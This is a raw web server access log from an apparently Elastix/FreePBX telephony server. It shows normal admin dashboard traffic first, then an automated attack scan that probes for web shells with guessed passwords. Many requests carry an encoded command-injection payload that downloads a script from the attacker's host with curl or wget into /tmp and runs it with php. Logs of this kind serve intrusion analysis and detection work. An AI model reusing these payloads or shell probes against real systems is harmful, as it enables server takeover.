76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-edwidgets.js HTTP/1.1" 200 3152
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-migrate-1.2.1.js HTTP/1.1" 200 16621
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-ui-1.11.4.min.js HTTP/1.1" 200 240427
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-colResizable-1.5.min.js HTTP/1.1" 200 5852
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-blockUI.js HTTP/1.1" 200 19910
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-1.11.2.min.js HTTP/1.1" 200 95931
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-ui-timepicker-addon.js HTTP/1.1" 200 78611
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-colorpicker.js HTTP/1.1" 200 17292
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-easing.1.3.js HTTP/1.1" 200 8097
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/gsap/main-gsap.js HTTP/1.1" 200 99007
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/bootstrap.js HTTP/1.1" 200 58330
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/joinable.js HTTP/1.1" 200 119975
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/resizeable.js HTTP/1.1" 200 2406
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-api.js HTTP/1.1" 200 13926
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/jquery.validate.min.js HTTP/1.1" 200 21068
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-custom.js HTTP/1.1" 200 48302
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-login.js HTTP/1.1" 200 9031
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-demo.js HTTP/1.1" 200 1964
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/images/elastix_logo_mini.png HTTP/1.1" 200 6100
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 200 40320
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /favicon.ico HTTP/1.1" 200 99678
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "POST / HTTP/1.1" 200 5409
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "POST / HTTP/1.1" 302 -
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /index.php HTTP/1.1" 200 70583
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/styles.css HTTP/1.1" 200 32972
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/help.css HTTP/1.1" 200 359
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/header.css HTTP/1.1" 200 9165
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/content.css HTTP/1.1" 200 7067
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/rightbar.css HTTP/1.1" 200 1254
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/css/1_style.css HTTP/1.1" 200 3056
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/applet.css HTTP/1.1" 200 1381
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/table.css HTTP/1.1" 200 6473
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/widgets.css HTTP/1.1" 200 485
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/base.js HTTP/1.1" 200 10924
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/sticky_note/sticky_note.css HTTP/1.1" 200 1825
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/sticky_note/sticky_note.js HTTP/1.1" 200 3207
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/1_javascript.js HTTP/1.1" 200 2324
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/iframe.js HTTP/1.1" 200 314
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/3_jquery.flot.time.js HTTP/1.1" 200 11768
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/5_justgage-1.1.0.min.js HTTP/1.1" 200 14662
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/4_raphael-2.1.4.min.js HTTP/1.1" 200 92764
76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/2_jquery.flot.js HTTP/1.1" 200 122971
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/elastix_logo_mini2.png HTTP/1.1" 200 5487
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/Icon-user.png HTTP/1.1" 200 21664
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/modalbox_bg.png HTTP/1.1" 200 1000
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /libs/font-icons/font-awesome/fonts/fontawesome-webfont.woff2?v=4.4.0 HTTP/1.1" 200 64464
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /libs/js/jquery/css/smoothness/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 200 208
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=registration&action=isRegistered&rawmode=yes HTTP/1.1" 200 178
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=PerformanceGraphic&action=getContent HTTP/1.1" 200 7518
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=SystemResources&action=getContent HTTP/1.1" 200 2339
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/SystemResources/js/javascript.js?=1497064534974 HTTP/1.1" 200 1363
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/SystemResources/tpl/css/styles.css HTTP/1.1" 200 223
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/images/applet_divisor.png HTTP/1.1" 200 998
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=CommunicationActivity&action=getContent HTTP/1.1" 200 2155
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=HardDrives&action=getContent HTTP/1.1" 200 1913
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=ProcessesStatus&action=getContent HTTP/1.1" 200 8406
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/CommunicationActivity/js/javascript.js?=1497064534975 HTTP/1.1" 200 628
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/CommunicationActivity/tpl/css/styles.css HTTP/1.1" 200 826
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/tpl/css/styles.css HTTP/1.1" 200 1065
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/js/javascript.js?=1497064534976 HTTP/1.1" 200 565
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/images/light_freespace.png HTTP/1.1" 200 958
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/images/light_usedspace.png HTTP/1.1" 200 958
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/tpl/css/styles.css HTTP/1.1" 200 1944
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/js/javascript.js?=1497064534977 HTTP/1.1" 200 2683
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_pbx.png HTTP/1.1" 200 2183
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_im.png HTTP/1.1" 200 2680
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/loading.gif HTTP/1.1" 200 2767
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_arrowdown.png HTTP/1.1" 200 1015
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_fax.png HTTP/1.1" 200 1506
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_headphones.png HTTP/1.1" 200 1905
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_www.png HTTP/1.1" 200 2655
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_db.png HTTP/1.1" 200 1637
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_email.png HTTP/1.1" 200 1998
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_arrowdown-disabled.png HTTP/1.1" 200 190
76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/bgicon.png HTTP/1.1" 200 1018
76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=News&action=getContent HTTP/1.1" 200 4889
76.108.242.230 - - [09/Jun/2017:23:15:38 -0400] "GET /modules/dashboard/applets/News/tpl/css/styles.css HTTP/1.1" 200 934
76.108.242.230 - - [09/Jun/2017:23:15:41 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=SystemResources&action=updateStatus HTTP/1.1" 200 98
76.108.242.230 - - [09/Jun/2017:23:15:41 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=CommunicationActivity&action=updateStatus HTTP/1.1" 200 83
76.108.242.230 - - [09/Jun/2017:23:15:44 -0400] "GET /index.php?menu=pbxadmin HTTP/1.1" 500 -
76.108.242.230 - - [09/Jun/2017:23:15:45 -0400] "GET /index.php HTTP/1.1" 500 -
92.114.32.161 - - [09/Jun/2017:23:39:42 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
92.114.32.161 - - [09/Jun/2017:23:39:43 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
92.114.32.161 - - [09/Jun/2017:23:53:55 -0400] "GET /recordings/ HTTP/1.1" 500 -
92.114.32.161 - - [09/Jun/2017:23:53:56 -0400] "GET /recordings/ HTTP/1.1" 500 -
92.114.32.161 - - [10/Jun/2017:00:17:47 -0400] "GET /recordings/ HTTP/1.1" 500 -
92.114.32.161 - - [10/Jun/2017:00:17:47 -0400] "GET / HTTP/1.0" 400 362
92.114.32.161 - - [10/Jun/2017:00:24:24 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
92.114.32.161 - - [10/Jun/2017:00:24:24 -0400] "GET / HTTP/1.0" 400 362
163.172.64.146 - - [10/Jun/2017:04:53:29 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
51.15.12.13 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 500 -
51.15.12.13 - - [10/Jun/2017:04:55:42 -0400] "POST /admin/ajax.php?module=music HTTP/1.1" 404 212
51.15.12.13 - - [10/Jun/2017:04:55:44 -0400] "POST /admin/ajax.php?module=blacklist HTTP/1.1" 404 212
51.15.12.13 - - [10/Jun/2017:04:55:45 -0400] "POST /admin/ajax.php?module=recordings HTTP/1.1" 404 212
51.15.12.13 - - [10/Jun/2017:04:55:46 -0400] "GET /admin/ajax.php HTTP/1.1" 404 212
51.15.12.13 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id HTTP/1.1" 404 214
51.15.12.13 - - [10/Jun/2017:04:55:48 -0400] "GET /admin/modules/backup/page.backup.php HTTP/1.1" 404 234
51.15.12.13 - - [10/Jun/2017:04:55:49 -0400] "POST /vtigercrm/phprint.php HTTP/1.1" 404 219
51.15.12.13 - - [10/Jun/2017:04:55:50 -0400] "POST / HTTP/1.1" 200 5409
51.15.12.13 - - [10/Jun/2017:04:55:51 -0400] "POST /admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 404 264
51.15.12.13 - - [10/Jun/2017:04:55:51 -0400] "POST /recordings/jeep.php HTTP/1.1" 403 221
51.15.12.13 - - [10/Jun/2017:04:55:52 -0400] "POST /admin/bootstrap.inc.php?mgp=danc3Uf%40t HTTP/1.1" 404 221
51.15.12.13 - - [10/Jun/2017:04:55:52 -0400] "POST /recordings/a7a.php HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:55:53 -0400] "POST /recordings/emad-shell.php HTTP/1.1" 403 227
51.15.12.13 - - [10/Jun/2017:04:55:53 -0400] "POST /recordings/emad.php HTTP/1.1" 403 221
51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/cmd.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/mcd.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/dmc.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:55:55 -0400] "POST /recordings/cmd.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:55:55 -0400] "POST /recordings/mcd.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:55:56 -0400] "POST /recordings/dmc.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:55:56 -0400] "POST /recordings/cmd.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:55:57 -0400] "POST /recordings/mcd.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:55:57 -0400] "POST /recordings/dmc.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:55:58 -0400] "POST /recordings/config.amportal.php HTTP/1.1" 403 232
51.15.12.13 - - [10/Jun/2017:04:55:58 -0400] "POST /recordings/scan.php HTTP/1.1" 403 221
51.15.12.13 - - [10/Jun/2017:04:55:59 -0400] "POST /vtigercrm/a7a.php HTTP/1.1" 404 215
51.15.12.13 - - [10/Jun/2017:04:55:59 -0400] "POST /vtigercrm/Hima.php HTTP/1.1" 404 216
51.15.12.13 - - [10/Jun/2017:04:56:00 -0400] "POST /vtigercrm/xXx-mat.php HTTP/1.1" 404 219
51.15.12.13 - - [10/Jun/2017:04:56:00 -0400] "POST /vtigercrm/Himaa.php HTTP/1.1" 404 217
51.15.12.13 - - [10/Jun/2017:04:56:01 -0400] "POST /recordings/3Zz.php HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:56:01 -0400] "POST /vtigercrm/3Zz.php HTTP/1.1" 404 215
51.15.12.13 - - [10/Jun/2017:04:56:02 -0400] "POST /vtigercrm/zizo.php HTTP/1.1" 404 216
51.15.12.13 - - [10/Jun/2017:04:56:02 -0400] "POST /vtigercrm/ops.php HTTP/1.1" 404 215
51.15.12.13 - - [10/Jun/2017:04:56:03 -0400] "POST /vtigercrm/xXx-ELMAYET-xXx.php HTTP/1.1" 404 227
51.15.12.13 - - [10/Jun/2017:04:56:03 -0400] "POST /zz.php.call HTTP/1.1" 404 209
51.15.12.13 - - [10/Jun/2017:04:56:04 -0400] "POST /vtigercrm/z.php?pass=angel HTTP/1.1" 404 213
51.15.12.13 - - [10/Jun/2017:04:56:04 -0400] "POST /z.php?pass=angel HTTP/1.1" 404 203
51.15.12.13 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/lol.php HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/badr2.php HTTP/1.1" 403 222
51.15.12.13 - - [10/Jun/2017:04:56:06 -0400] "POST /recordings/Go.php HTTP/1.1" 403 219
51.15.12.13 - - [10/Jun/2017:04:56:06 -0400] "POST /recordings/info.php HTTP/1.1" 403 221
51.15.12.13 - - [10/Jun/2017:04:56:07 -0400] "POST /recordings/11.php HTTP/1.1" 403 219
51.15.12.13 - - [10/Jun/2017:04:56:07 -0400] "POST /vtigercrm/moaz.php HTTP/1.1" 404 216
51.15.12.13 - - [10/Jun/2017:04:56:08 -0400] "POST /vtigercrm/11.php HTTP/1.1" 404 214
51.15.12.13 - - [10/Jun/2017:04:56:08 -0400] "POST /11.php HTTP/1.1" 404 204
51.15.12.13 - - [10/Jun/2017:04:56:09 -0400] "POST /recordings/a8a.php HTTP/1.1" 403 220
51.15.12.13 - - [10/Jun/2017:04:56:09 -0400] "POST /wav.php HTTP/1.1" 404 205
51.15.12.13 - - [10/Jun/2017:04:56:10 -0400] "POST /_asterisk/V-E-M.php?268e31510577740=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 404 217
51.15.12.13 - - [10/Jun/2017:04:56:10 -0400] "POST /x1.php HTTP/1.1" 404 204
51.15.12.13 - - [10/Jun/2017:04:56:11 -0400] "POST /recordings/webadmin.php HTTP/1.1" 403 225
51.15.12.13 - - [10/Jun/2017:04:56:11 -0400] "POST /panel/webadmin.php HTTP/1.1" 404 216
51.15.12.13 - - [10/Jun/2017:04:56:12 -0400] "POST /webadmin.php HTTP/1.1" 404 210
51.15.12.13 - - [10/Jun/2017:04:56:12 -0400] "POST /panel/main.php HTTP/1.1" 404 212
51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php?act=cmd HTTP/1.1" 404 212
51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1 HTTP/1.1" 404 214
51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1?act=cmd HTTP/1.1" 404 214
51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.2 HTTP/1.1" 404 214
51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /panel/main.php.2?act=cmd HTTP/1.1" 404 214
51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php HTTP/1.1" 403 221
51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php?act=cmd HTTP/1.1" 403 221
51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php.1 HTTP/1.1" 403 223
51.15.12.13 - - [10/Jun/2017:04:56:15 -0400] "POST /recordings/main.php.1?act=cmd HTTP/1.1" 403 223
51.15.12.13 - - [10/Jun/2017:04:56:15 -0400] "POST /recordings/main.php.2 HTTP/1.1" 403 223
51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /recordings/main.php.2?act=cmd HTTP/1.1" 403 223
51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /main.php HTTP/1.1" 404 206
51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /main.php?act=cmd HTTP/1.1" 404 206
51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /vtigercrm/main.php HTTP/1.1" 404 216
